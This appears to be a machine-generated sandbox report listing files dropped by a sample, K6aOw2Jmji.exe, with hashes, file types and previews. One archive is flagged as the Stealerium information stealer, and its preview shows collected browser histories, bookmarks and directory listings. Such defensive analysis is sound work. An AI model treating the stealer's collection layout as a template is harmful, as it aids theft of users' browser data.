                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.3.5.3.3.2.0.1.4.8.4.7.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.3.5.3.3.2.1.5.3.9.1.0.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.8.3.e.e.c.f.-.6.6.2.5.-.4.5.4.f.-.a.4.5.6.-.7.9.f.4.f.f.3.2.e.4.e.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.2.3.1.7.9.4.-.1.8.5.a.-.4.e.a.8.-.8.c.6.a.-.b.c.6.b.8.9.6.2.0.f.8.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.K.6.a.O.w.2.J.m.j.i...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.t.u.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.0.0.-.0.0.0.1.-.0.0.1.4.-.2.e.d.6.-.8.7.c.d.5.1.4.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.8.2.7.c.9.8.c.8.c.9.9.3.e.9.2.1.3.7.2.1.7.d.0.2.e.c.5.b.3.9.b.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.2.5.d.1.d.1.7.4.f.b.1.0.d.9.1.9.a.6.f.5.b.5.f.5.c.a.2.d.2.d.8.3.4.8.5.a.f.!.K.6.a.O.w.2.J.m.j.i...e.x.e...
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:Mini DuMP crash report, 16 streams, Fri Nov 29 11:28:40 2024, 0x1205a4 type
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):798008
                                                                                                                                                            Entropy (8bit):3.1384455581765422
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:ZEi3HDG0c+4aalhq8rjVW3Q24YcRGoJNn/l6yIA:zx7UXqoWQ24YcRRJNn/cHA
                                                                                                                                                            MD5:993F63079D8EE47ACB3F504F37CBB42B
                                                                                                                                                            SHA1:38C5A040368AC1372145E397955A3ED5DE2782ED
                                                                                                                                                            SHA-256:53267E9A2F374BFCF7D146D32CCBD3EBEF3F50F306614D70331355BB4236DB7D
                                                                                                                                                            SHA-512:86E899485766A32BEAC91A029ACF9F397047D885A9E5741C8DF651472668D1A8067C0FB7363E6CCFC3B101B868A7667F164541A5723DFA1552A519E63DA0F4C9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MDMP..a..... .......h.Ig.........................*..........<....6.......@...6......d...p...........l.......8...........T............o..p............w...........y..............................................................................eJ......\z......Lw......................T...........X.Ig.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):9098
                                                                                                                                                            Entropy (8bit):3.7090067639745357
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:R6l7wVeJB0t6Y9Xt7TgmfZV8UyUprD89bq16fUKOm:R6lXJSt6Y9tPgmfgUy9qIfn
                                                                                                                                                            MD5:104D9F969847529F7075BE2845A15BD0
                                                                                                                                                            SHA1:A0F14CE3F3BFB4E2BC8E80D68E1C7E9EB40AA8E5
                                                                                                                                                            SHA-256:164E31C6EAE81F3410FA68322CD51717AB74A40A1CA80C1783914A7C3BE7E1F5
                                                                                                                                                            SHA-512:6C2232F00FC17344CD6E9575C7D68AC06E1E63DDF52D9106B7A32A539D69F3019CD899C1AE503A789CA459F6A8B47380FB7F0413EAD7DBDCCBDE80FFFFA078E1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.0.0.<./.P.i.
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4806
                                                                                                                                                            Entropy (8bit):4.474576961472362
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:cvIwWl8zsDJg771I9H0WpW8VYcYm8M4JYEeEI8FOn5yq8vqEI6Yt5tBnd:uIjfdI7ot7VcJYEeEWWqEXYt5t9d
                                                                                                                                                            MD5:B40B3739295EE9A7461853D069E22560
                                                                                                                                                            SHA1:EF2470529748D585F059878BB5E1199B9C9CA3AE
                                                                                                                                                            SHA-256:3DA9164F84A76366CC15E47A9C9E6AE288567720EBFB1F136C1A42B614898E92
                                                                                                                                                            SHA-512:A12031C11F01ACE5FF5B0C41B5DD4A8CE9DDBE6CB7CFD52738A31F322EF8128A06B4A21EDE716A9FFCDBB30329F2370B599A1D4D1EB69640AD8D549D26661C89
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="609271" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5242880
                                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):106496
                                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40960
                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):159744
                                                                                                                                                            Entropy (8bit):0.7873599747470391
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):159744
                                                                                                                                                            Entropy (8bit):0.7873599747470391
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):98304
                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):106496
                                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):114688
                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):114688
                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):49152
                                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):126976
                                                                                                                                                            Entropy (8bit):0.47147045728725767
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5242880
                                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):118556
                                                                                                                                                            Entropy (8bit):7.938417166414126
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:et9Zh1xOUIpSlWmDGr5R3vylhiMaDo/Ge58hb:i9ZhoDFCf/Gewb
                                                                                                                                                            MD5:86A8FFF9E112A5E959EB5B857321F3EE
                                                                                                                                                            SHA1:6B576ECE07E251E9875217710A10BE5AE8EB0662
                                                                                                                                                            SHA-256:CCA6DF87349C1EC691E7E8EBD5F530A33DD06B48F534EB0E629BF4E77AC4A925
                                                                                                                                                            SHA-512:BC9A94C06CEDF986BF98D48DA8DFABA692759F5DED5515A1830EFF9AE38BF99243D684FA72643E0CB7EED52926BF1CB0DFF1F228833808A4795F27A4B17CB4F1
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH.zip, Author: Joe Security
                                                                                                                                                            Preview:PK.........3}Y................Browsers/Edge/History.txtTCah-A..z:.PK.........3}Yq.C]t...........Browsers/Firefox/Bookmarks.txt..8}3.Z.........\.g.(.;1.b.....O.....-..%O.@U.?...9..-6.v....T..wA...<.61..d=..P..Y.s_..P0....#o...~z......?PK..q.C]t.......PK.........3}Y...sl...^.......Browsers/Firefox/History.txt.LJ..D..d8.x.@.....i....z;Y~..-......H^..g1..P.ls.P...UD..b.m...E.Lj....l.,.I.>.R....W.......1..`.Q..PK.....sl...^...PK.........3}Y................Browsers/Google/Downloads.txtUmf....Ys.YmPK.........3}Y................Browsers/Google/History.txt..^..p.s.vMPK.........3}Y.......5.......Directories/Desktop.txt...u(.n...iY..P.........{Z_..uk..+.Re"......N|.k.....Q..w..'. .<..y`<7..].q..lR-..6..*o.X..2l.^......oO.......G$.O..{..,....}..G.d........!...).e...[5.(..........CG..6...........t/M...........#.<.%.q......H.....NJ..-.lk.C..k..]x.....o..+..uE.....R.F.jPK.........5...PK.........3}YC.h.+...........Directories/Documents.txtR.&F....}....w...|.b.H`R..+..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):220
                                                                                                                                                            Entropy (8bit):4.546534105739819
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:Kw5FBeKjMnf3eKj5ZKMeKjYLC/eKjtyRE2YReK3:KCBH4n/HHKMHsL0HMRE2uH3
                                                                                                                                                            MD5:2AB1FD921B6C195114E506007BA9FE05
                                                                                                                                                            SHA1:90033C6EE56461CA959482C9692CF6CFB6C5C6AF
                                                                                                                                                            SHA-256:C79CFDD6D0757EB52FBB021E7F0DA1A2A8F1DD81DCD3A4E62239778545A09ECC
                                                                                                                                                            SHA-512:4F0570D7C7762ECB4DCF3171AE67DA3C56AA044419695E5A05F318E550F1A910A616F5691B15ABFE831B654718EC97A534914BD172AA7A963609EBD8E1FAE0A5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Title: Get Help.URL: (No URL provided)..Title: Customize Firefox.URL: (No URL provided)..Title: Get Involved.URL: (No URL provided)..Title: About Us.URL: (No URL provided)..Title: Getting Started.URL: (No URL provided)..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):94
                                                                                                                                                            Entropy (8bit):4.890995272476094
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:qtNRROrSLvIJiMhKVX3L2WdXOfZiGPHA9lfMJJEv:MeGLciA8dXwZiG/CF0Ev
                                                                                                                                                            MD5:A72509876646BC379E1D8C3B895ED0ED
                                                                                                                                                            SHA1:2F270C6A8E07FA7FEE8C07A1FD100474A9A513A8
                                                                                                                                                            SHA-256:8BF712CABAC55E09FF74348817A29572826688AE4AB516848FE882BC5DEF91E7
                                                                                                                                                            SHA-512:FDCB7BB82C0AF434610311D7B12EB2D6AEF7ADB8B040EBA97D3F115C18810799EEDC02B39AF6992C15552568B5BC799889CC185191D5E783DEB82DC98946A5EB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:URL: https://www.mozilla.org/en-US/privacy/firefox/.Title: Firefox Privacy Notice . Mozilla.
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):244
                                                                                                                                                            Entropy (8bit):5.087743120757909
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:Uqf7R5WzLVMz3eYeDPO+YtnJXQcOG4E2WzLVMz3eYeDPOCd4:UO2zGjeDDPOtnKcOHPWzGjeDDPO7
                                                                                                                                                            MD5:4C0A246FFF442FDA266D22D0038B1D16
                                                                                                                                                            SHA1:9EC99F882E0D4B9B9305AADBA1875F88CF7A740D
                                                                                                                                                            SHA-256:44F3AB1DC0DC9397D7CE58C447533146360F68AFD3114D22AAE5056B10EC0E24
                                                                                                                                                            SHA-512:6E1C3DB12EBAA416448581C24D7FB1DD7F34BBD1FB40E8657B8A8FEBA9653E99BCD31B599DC7CA52E31C5560ECEA8E40B73C7E6DE1362AFF459E59F5B18B6D8D
                                                                                                                                                            Malicious:false
